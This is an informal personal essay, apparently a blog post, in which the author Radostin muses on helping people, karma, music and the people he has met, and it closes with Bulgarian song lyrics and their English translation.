I am pouring my soul in this ( as I do when I write things ). I have found my place in this world, I love helping people, the moment when somebody says Thank you makes it all worth it. I do what I do because of people who have a problem and it makes me feel like I have done something good in this world. And at the end that is all that matters to me! So far I have figured out I am immortal, I will die when I have helped this world and made it a better place, that is why I was born in this place ( a shithole fore most of my friends ).

This is getting a bit long but I do not care. See this place here is wonderfull, shitty, painfull, beautiful, full of wonderful people, full of people who THINK ! Full of people, all kinds, bad, good, indifferent, white, black, green, blue… And here I sit writing things.

Beauty is in the eye of the beholder, I have met ( and still meet ) an incredible amount of people, some I never thought I would meet, even talk to but yet it happens. When you lose focus the world is just a very simple blur, I love that blur, it helps you see it as it is. You encounter a situation and you react to the best of your abilities, what happens next doesn’t matter. There is no good or bad, karma responds to your intentions, if you wanted to do good but it ends in disaster, no matter how much you try to fix it it just gets worse, that is still good karma … I am pretty sure I have an insane amount of good karma on my side but that doesn’t make me a good person. Its not what I did it is what I do and what I will do!

Smoke break, I need to clear my head a bit, or maybe not but still I am doing it anyway because it feels right. Don’t be sad, I will be back before you know it (;

Leaving space to let you know I have been gone for a while d:

I love writing ! Its worse than heroin… I have been doing this for at least half an hour … OK maybe an hour : )

I got sick at some point ( I haven’t been sick that much so that I can’t get off my bed for at least 20 years but I regret nothing )!

A bit of a pickmeup : )

I am a creature that lives in music. I have literally didn’t sleep for about 4 days, I drank an energy drink and stopped, then I put on Linkin park’s first album with the volume to the max and in half a minute I was jumping and reaching the roof. I am music ! Kinda like Oppenheimer’s speach about the project Manhattan – I am become death, the destroyer of worlds… The saddness in his eyes says it all, whenever I think about this I start to cry…

My name is RadostIn a simple translation is HappinesIn and I am happy that I met another person with my name and he is the same “provider” of happiness, cause I have met another 2 who were the opposite…

I am proud to say that I have met some of the most amazing people that this world can provide and some of the worst too. Be afraid of people who avoid eye contact.

I am wondering right now what else can I write, but I want to continue, so I will finish this smoke and see what comes (;

Ръцете във атака, не щадете гърлата, сърцето не кляка, това ни е живота бе казано накратко! Първо отворете двете после трето око ! Hands on attack, don’t spare your throats, the heart doesn’t back down, this is our life to put it simply! First open two eyes then the third !